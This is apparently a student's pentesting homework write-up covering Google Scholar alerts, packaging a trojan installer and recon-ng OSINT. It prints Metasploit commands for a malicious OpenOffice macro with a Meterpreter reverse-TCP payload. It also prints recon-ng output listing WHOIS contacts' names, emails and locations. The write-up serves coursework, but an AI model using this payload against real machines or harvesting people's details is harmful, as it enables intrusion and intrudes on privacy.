Penetration testing OSINT and packaging trojan horse

H6 – OSINT and Trojan horse packaging

Assignment given by Tero Karvinen

1) Find a recent (under 1-2 years old) article from Google Scholar that relates to the course topic. Suitable ones are peer-reviewed journal articles or conference papers (conference papers are a slightly lower level than journal articles). Remember to adjust the settings: English. Library links: Haaga-Helia. No citations, no patents. Since 2017. Full texts (full text PDF) are on the right-hand side. What practical thing applicable to pentesting did you learn from the article?

2) Do a Google Scholar search on an interesting topic that you want to follow. What do the 5 newest or most cited articles say? You can skim the articles; there is no need to summarize them comprehensively. Subscribe to the search in your own email (alerts). This way you keep up with new scientific research in your field; perhaps you will already have the area mastered when you start your thesis.

3) Package a trojan horse yourself. You can make the installer with, for example, the Inno Setup program. You can also try packing a hostile program and a normal program into the same installer; this way you do not have to modify the normal program's binary. Name the programs so that the malicious purpose is evident: MALWARE-installer.exe. Do not make self-spreading programs.

4) OSINT. From where and with what techniques can you search for information about people from open sources? You can also try applications, e.g. maltego (closed) or recon-ng (free), as well as websites (e.g. inteltechniques.com) and guides (e.g. email). You can also use offline sources. (This item covers techniques, tools and websites; do not put your partner's information here.)

5) Search for information about your partner from open sources. Try to compile a comprehensive profile of the person: history, interests, political opinions, close circle, financial situation, place of residence… Do not publish the results even anonymized, not even behind a password, and do not tell outsiders funny anecdotes about them. Give the results to your partner (the one the information is about). Ask your partner in advance which information we can discuss in class and at what level of detail. Use only legal techniques and public sources. In this assignment you may not break into anything, nor impersonate another person. Be worthy of the client's (your partner's) trust; your pentest clients also require confidentiality.

6) Optional: Code your own trojan horse. It could, for example, exfiltrate confidential files (browser passwords, secret keys), record keystrokes (this will probably trigger the antivirus/IDS) or secretly install more programs.


Testing Environment

For this assignment I used an Acer 5439 laptop running Ubuntu 18.04 LTS.


1) Google Scholar I

For the first assignment I had to choose one peer-reviewed journal article or conference paper and write what I learned from it.

For this assignment I read http://www.bgupta.com/resources/21-Gupta-2017-Gold.pdf. The author goes through hacking and pen testing and also gives some examples of web applications that were hacked. What I mainly learned from this was how someone should preemptively prepare for getting hacked.

The DREAD vulnerability risk assessment model was new to me. The DREAD model is used to keep track of how secure your application is. DREAD stands for:

  • D = Damage
  • R = Reproducibility
  • E = Exploitability
  • A = Affected Users
  • D = Discoverability

Then the index is calculated:

DREAD Index = (DAMAGE + REPRODUCIBILITY + EXPLOITABILITY + AFFECTED USERS + DISCOVERABILITY) / 5

With this a vulnerability can be scored and you can decide what to do with it.
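As an added example (my own code, not from the article), here is the DREAD formula above applied to several findings at once, with the findings ranked by their index. The 0-10 scale per factor and the priority thresholds are assumptions; the article only gives the formula.

```python
from dataclasses import dataclass

# Assumed scale: each DREAD factor is rated 0-10 (the page gives the formula but no scale).
FACTORS = ("damage", "reproducibility", "exploitability", "affected_users", "discoverability")


@dataclass(frozen=True)
class Finding:
    name: str
    damage: int
    reproducibility: int
    exploitability: int
    affected_users: int
    discoverability: int


def dread_index(f: Finding) -> float:
    """DREAD Index = (D + R + E + A + D) / 5, the formula quoted on the page."""
    total = 0
    for factor in FACTORS:
        score = getattr(f, factor)
        if not 0 <= score <= 10:
            raise ValueError(f"{f.name}: {factor}={score} is outside the assumed 0-10 scale")
        total += score
    return total / 5


def priority(index: float) -> str:
    """Hypothetical triage bands; pick thresholds that fit your own risk appetite."""
    if index >= 8:
        return "critical"
    if index >= 6:
        return "high"
    if index >= 4:
        return "medium"
    return "low"


def rank_findings(findings):
    """Return (name, index, priority) tuples, highest DREAD index first."""
    scored = [(f.name, dread_index(f), priority(dread_index(f))) for f in findings]
    return sorted(scored, key=lambda row: row[1], reverse=True)


# Constructed sample findings for a web application (illustrative scores, not from the page).
SAMPLE_FINDINGS = [
    Finding("Weak Content-Security-Policy", 2, 6, 3, 4, 5),
    Finding("SQL injection in login form", 9, 10, 8, 10, 8),
    Finding("Verbose stack trace on error page", 2, 10, 10, 5, 10),
]

if __name__ == "__main__":
    for name, index, level in rank_findings(SAMPLE_FINDINGS):
        print(f"{index:4.1f}  {level:8}  {name}")
```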


2) Google Scholar II

I had to search for the newest articles on topics I am interested in and then subscribe to the searches.

Making alerts is easy in Google Scholar.

On the main screen, click the "hamburger" menu button.

After clicking the "hamburger" menu, a side menu opens.

Then click Alerts.

Then click CREATE ALERT.

When you choose CREATE ALERT again, the alert is created.

And that is how to create an alert.

IoT: https://cs.gmu.edu/~astavrou/research/DDoS_Mirai.pdf = This short article explains that any IoT device can be exposed to denial-of-service attacks.

Robotics deep learning: http://journals.sagepub.com/doi/pdf/10.1177/0278364917710318 = This article covers how robots learn hand-eye coordination.

Virtual Reality: http://pediatrics.aappublications.org/content/140/Supplement_2/S86 = I am interested in what direction virtual reality is going, and here it is described how virtual reality is used in psychology.

Kali Linux: https://books.google.fi/books?hl=en&lr=&id=-Z9XAQAAQBAJ&oi=fnd&pg=PP15&dq=kali+linux%C2%A8&ots=rji3dtSuQD&sig=w1Z_NqyPD58swJN0tXMRwVJgEFU&redir_esc=y#v=onepage&q=kali%20linux%C2%A8&f=false = A cookbook for Kali Linux.

Deep Dark Web: https://www.cigionline.org/sites/default/files/gcig_paper_no6.pdf = How the deep dark web is impacting the internet and cyber security.


3) Bundled Trojan Horse

For this assignment I had to bundle a trojan horse with some program, or just bundle a trojan horse on its own, using for example Inno Setup.

I started this assignment by downloading Inno Setup.

Now I had Inno Setup installed, so next I had to make a trojan horse, and for that I had to go to Kali Linux.

Making the reverse_tcp

So in Kali Linux I opened Metasploit

$ sudo msfdb init

$ sudo msfconsole

When Metasploit was open I started making the trojan horse.

msf > use exploit/multi/misc/openoffice_document_macro

msf exploit(multi/misc/openoffice_document_macro) > set payload windows/meterpreter/reverse_tcp

Then I had to specify the IP address and the port to listen on.

msf exploit(multi/misc/openoffice_document_macro) > set LHOST {your ip-addres}

msf exploit(multi/misc/openoffice_document_macro) > set LPORT {can be any port}

Now I had to run it, and it would create a macro file for OpenOffice.

And it was running. Now the target would only have to open the file and I would get access to the target's computer, but as we are making it into a program, let's do that first.

Bundle trojan horse

So now I had my 2 files and could start making the program.

I started by selecting "Create a new script file using the Script Wizard".

Next here.

Here you can give a name, a version number and other info, but for now I am going to leave it like that.

Left it like this…

Here I had to select the main application that would be executed, and then the virus file or any other file you want it to run.

This window is up to you, but here are my choices.

Didn't have any of these, so I left them blank.

Chose English.

The first is where the program would be installed and the second is the name of the executable file. The others I left blank.

This one can be left blank or not.

And now it was finished… But as I looked at the script code, it didn't run my malware file anywhere and therefore it wouldn't work.

For this to work it requires more work from me.


4) OSINT

For this assignment I had to tell how, and with what techniques, I could get a person's information. There are many ways to OSINT someone, but I am going to show a few tools, and maybe in the future I will explain how to use the tools in more detail.

Recon-ng

If you have Kali Linux then it probably is already installed and can be opened with a command:

$ recon-ng

If you don't have Kali Linux and have for example Ubuntu, instructions on how to install can be found on the Recon-ng Bitbucket.

Using recon-ng

[recon-ng][default] > add domains
domain (TEXT): facebook.com
[recon-ng][default] > show domains

+-------------------------------------+
| rowid | domain | module |
+-------------------------------------+
| 1 | facebook.com | user_defined |
+-------------------------------------+

[*] 1 rows returned

When Recon-ng is opened, first I had to add a domain from which I will get some info. I will try to get something from facebook.com.

[recon-ng][default] > use whois_pocs
[recon-ng][default][whois_pocs] > show info

Name: Whois POC Harvester
Path: modules/recon/domains-contacts/whois_pocs.py
Author: Tim Tomes (@LaNMaSteR53)

Description:
Uses the ARIN Whois RWS to harvest POC data from whois queries for the given domain. Updates the
'contacts' table with the results.

Options:
Name Current Value Required Description
------ ------------- -------- -----------
SOURCE default yes source of input (see 'show info' for details)

Source Options:
default SELECT DISTINCT domain FROM domains WHERE domain IS NOT NULL
<string> string representing a single input
<path> path to a file containing a list of inputs
query <sql> database query returning one column of inputs

Then I set recon-ng to use whois_pocs for gathering information.

[recon-ng][default][whois_pocs] > run

------------
FACEBOOK.COM
------------
[*] URL: http://whois.arin.net/rest/pocs;domain=facebook.com
[*] URL: http://whois.arin.net/rest/poc/NOL17-ARIN
[*] [contact] Lea Neteork ops (leigha311@facebook.com) - Whois contact
[*] URL: http://whois.arin.net/rest/poc/OPERA82-ARIN
[*] [contact] <blank> Operations (domain@facebook.com) - Whois contact
[*] URL: http://whois.arin.net/rest/poc/BST184-ARIN
[*] [contact] Brandon Stout (bstout@facebook.com) - Whois contact
[*] URL: http://whois.arin.net/rest/poc/DJW23-ARIN
[*] [contact] Darrell Wayne (tiffany.cameron.507@facebook.com) - Whois contact
[*] URL: http://whois.arin.net/rest/poc/MZU-ARIN
[*] [contact] Mark Zuckerberg (zuck@thefacebook.com) - Whois contact

SUMMARY
-------
[*] 5 total (0 new) contacts found.
[recon-ng][default][whois_pocs] >

And when I ran it I got some information with whois_pocs.

I don't have much here, but if I had much more I could view all the contacts with the command show contacts:

[recon-ng][default][whois_pocs] > show contacts

+--------------------------------------------------------------------------------------------------------------------------------------+
| rowid | first_name | middle_name | last_name | email | title | region | country | module |
+--------------------------------------------------------------------------------------------------------------------------------------+
| 1 | Jay | | Simon | jay@oneplus.com | Whois contact | Northbrook, IL | United States | whois_pocs |
| 2 | Rick | | Stewart | rstewart@cardoneplus.com | Whois contact | Toronto, ON | Canada | whois_pocs |
| 3 | Lea | | Neteork ops | leigha311@facebook.com | Whois contact | Dalton, GA | United States | whois_pocs |
| 4 | | | Operations | domain@facebook.com | Whois contact | Menlo Park, CA | United States | whois_pocs |
| 5 | Brandon | | Stout | bstout@facebook.com | Whois contact | Chicago, IL | United States | whois_pocs |
| 6 | Darrell | | Wayne | tiffany.cameron.507@facebook.com | Whois contact | Flowermound, TX | United States | whois_pocs |
| 7 | Mark | | Zuckerberg | zuck@thefacebook.com | Whois contact | Palo Alto, CA | United States | whois_pocs |
+--------------------------------------------------------------------------------------------------------------------------------------+

[*] 7 rows returned

It returned the results in a neat table.

Now to get more information. First let's go back one step.

[recon-ng][default][whois_pocs] > back

Now let's get some subdomains.

[recon-ng][default] > use bing_domain_web

And again type run to run the scan.

[recon-ng][default][bing_domain_web] > run

------------
FACEBOOK.COM
------------
[*] URL: https://www.bing.com/search?first=0&q=domain%3Afacebook.com
[*] [host] web.facebook.com (<blank>)
[*] [host] http://www.facebook.com (<blank>)
[*] [host] mobile.facebook.com (<blank>)
[*] [host] m.facebook.com (<blank>)
[*] [host] fi-fi.latest.facebook.com (<blank>)
[*] [host] fr-ca.facebook.com (<blank>)
[*] [host] fi-fi.prod.facebook.com (<blank>)
[*] [host] fi-fi.facebook.com (<blank>)
[*] Sleeping to avoid lockout...

-------
SUMMARY
-------
[*] 51 total (51 new) hosts found.

It didn't take long and I got some information. Let's also see what it gave with the command "show hosts".

[recon-ng][default][bing_domain_web] > show hosts

+-------------------------------------------------------------------------------------------------------------+
| rowid | host | ip_address | region | country | latitude | longitude | module |
+-------------------------------------------------------------------------------------------------------------+
| 1 | web.facebook.com | | | | | | bing_domain_web |
| 2 | http://www.facebook.com | | | | | | bing_domain_web |
| 3 | mobile.facebook.com | | | | | | bing_domain_web |
| 4 | m.facebook.com | | | | | | bing_domain_web |
| 5 | fi-fi.latest.facebook.com | | | | | | bing_domain_web |
| 6 | fr-ca.facebook.com | | | | | | bing_domain_web |
| 7 | fi-fi.prod.facebook.com | | | | | | bing_domain_web |
| 8 | fi-fi.facebook.com | | | | | | bing_domain_web |
| 9 | en-gb.facebook.com | | | | | | bing_domain_web |
| 10 | hr-hr.facebook.com | | | | | | bing_domain_web |

……

[*] 51 rows returned

With these basic commands you can get some information. There are many more that I haven't tested, but I will update this if I test them.
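As an added example (my own code, not part of recon-ng or this post), here is a small parser for the ASCII table that show contacts prints, used from the defender's side: it picks out WHOIS contacts tied to a named person, which is exactly the kind of detail an organisation would rather replace with a role mailbox. The sample output is constructed with example.com addresses in the same layout as the table above, and the list of role mailbox names is an assumption.

```python
# Constructed sample output in the layout of recon-ng's `show contacts` (not real data).
SAMPLE_OUTPUT = """\
[recon-ng][default][whois_pocs] > show contacts

+-------+------------+-------------+------------+---------------------------+---------------+----------+---------+------------+
| rowid | first_name | middle_name | last_name | email | title | region | country | module |
+-------+------------+-------------+------------+---------------------------+---------------+----------+---------+------------+
| 1 | Anna | | Virtanen | anna.virtanen@example.com | Whois contact | Helsinki | Finland | whois_pocs |
| 2 | | | Operations | hostmaster@example.com | Whois contact | Helsinki | Finland | whois_pocs |
| 3 | Mikko | | Korhonen | mikko@example.com | Whois contact | Espoo | Finland | whois_pocs |
+-------+------------+-------------+------------+---------------------------+---------------+----------+---------+------------+

[*] 3 rows returned
"""

# Local parts that denote a role mailbox rather than a person (assumed list, extend as needed).
ROLE_MAILBOXES = {"hostmaster", "abuse", "noc", "domain", "operations", "admin", "postmaster", "security"}


def parse_recon_table(text):
    """Turn recon-ng's '| a | b |' rows into dicts keyed by the header row."""
    header, rows = None, []
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("|"):
            continue  # skips borders (+----+), the prompt and the '[*] n rows returned' line
        cells = [c.strip() for c in line.strip("|").split("|")]
        if header is None:
            header = cells
        else:
            rows.append(dict(zip(header, cells)))
    return rows


def is_role_contact(contact):
    """A contact with no first name, or a role-style local part, is not a named individual."""
    local_part = contact["email"].split("@", 1)[0].lower()
    return local_part in ROLE_MAILBOXES or not contact["first_name"]


def personal_contacts(text):
    """Emails of named individuals exposed in WHOIS: candidates to replace with role mailboxes."""
    return [c["email"] for c in parse_recon_table(text) if not is_role_contact(c)]


if __name__ == "__main__":
    for email in personal_contacts(SAMPLE_OUTPUT):
        print("named individual exposed in WHOIS:", email)
```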



5)


6)  (optional)
